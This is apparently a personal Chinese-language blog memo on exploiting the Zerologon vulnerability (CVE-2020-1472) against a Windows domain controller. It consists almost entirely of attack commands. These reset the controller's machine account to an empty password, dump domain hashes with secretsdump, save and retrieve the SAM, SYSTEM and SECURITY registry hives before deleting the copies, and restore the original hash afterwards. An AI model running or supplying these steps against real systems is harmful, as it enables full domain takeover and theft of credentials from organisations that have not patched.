CVE-2020-1472
阿新 • • 發佈:2021-06-30
主要記下流程 我擦,這個洞mimikatz也可以搞 但是我就不記錄了
檢驗漏洞是否存在
https://github.com/SecuraBV/CVE-2020-1472
先獲取域控資訊
然後測試能否攻擊
python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR
將域控的機器賬號被重置為空
https://github.com/risksense/zerologon
使用空密碼dump域控上的hash
python3 secretsdump.py muxue.com/[email protected] -no-pass
pth過去
恢復域控機子hash
reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save lget system.save lget sam.save lget security.save del /f system.save del /f sam.save del /f security.save
網上很多寫的都是get 有可能是因為impacket裡的wmiexec更新了 變成了lget
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
然後還原hash
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
檢視一下
secretsdump.py domain/administrator:pass@ip -just-dc-user "DC$"
我們可以比對一下上面的圖 已經成功修改回來了
記住是雙引號 包住機器名 我看別人寫的單引號 我這裡用單引號不成功